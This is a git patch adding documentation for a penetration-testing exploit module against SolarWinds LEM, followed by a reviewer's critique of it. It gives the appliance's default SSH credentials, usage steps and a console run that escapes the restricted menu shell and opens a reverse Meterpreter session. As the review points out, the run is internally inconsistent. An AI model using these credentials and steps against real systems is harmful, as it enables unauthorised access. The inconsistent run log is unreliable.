From c87ea2107bc3123bdf40a30b65f74fc04a431b23 Mon Sep 17 00:00:00 2001 From: Mehmet Ince Date: Thu, 23 Mar 2017 12:49:50 +0300 Subject: [PATCH] Add documentation --- .../exploit/linux/ssh/solarwinds_lem_exec.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md diff --git a/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md b/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md new file mode 100644 index 0000000000..535d31b81c --- /dev/null +++ b/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md 
@@ -0,0 +1,49 @@ +## Vulnerable Application + +This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + +Vulnerable application can be download as a free trial from vendor webpage. +[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager) + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/ssh/solarwinds_lem_exec` + 3. Do: `set rhost ` + 4. Do: `set lhost ` + 5. Do: `exploit` + 6. You should get a shell. + +## Scenarios + +This is a run against a known vulnerable Solarwinds LEM server. +``` +msf exploit(solarwind_lem_exec) > exploit + +[*] Started reverse TCP handler on 12.0.0.1:4444 +[*] 12.0.0.154:32022 - Attempt to login... +[+] SSH connection is established. +[*] Requesting pty... We need it in order to interact with menuing system. +[+] Pty successfully obtained. +[*] Requesting a shell. +[+] Remote shell successfully obtained. +[+] Step 1 is done. Managed to access terminal menu. +[+] Step 2 is done. Managed to select 'service' sub menu. +[+] Step 2 is done. Managed to select 'service' sub menu. +[+] Step 3 is done. Managed to start 'restrictssh' function. +[+] Step 4 is done. We are going to try escape from jail shell. +[+] Sweet..! Escaped from jail. +[*] Delivering payload... +[*] Sending stage (38651 bytes) to 12.0.0.154 +[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300 +[-] Exploit failed: Errno::EBADF Bad file descriptor +[*] Exploit completed, but no session was created. + +msf exploit(solarwind_lem_exec) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: cmc +meterpreter > +``` +
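Review bot: The Scenarios transcript does not show a clean run: it ends with `[-] Exploit failed: Errno::EBADF Bad file descriptor` and `[*] Exploit completed, but no session was created.`, and the session it reports opening is number 3 while the next command is `sessions -i 1`. Please capture a fresh run where the opened session and the one interacted with match, or add a sentence explaining the EBADF error if it is expected behaviour. In the same block, the prompt reads `solarwind_lem_exec` while the file name and the `use` line say `solarwinds_lem_exec`, and the "Step 2 is done" line appears twice. Under Verification Steps, `set rhost ` and `set lhost ` carry no value or placeholder, and the run targets port 32022 without the steps saying whether that is the module's default port or has to be set. Vulnerable Application should name the affected LEM versions, and the wording needs a pass: "SolarWind LEM" against "Solarwinds LEM" later in the file, "a vulnerability that exist", "can be download".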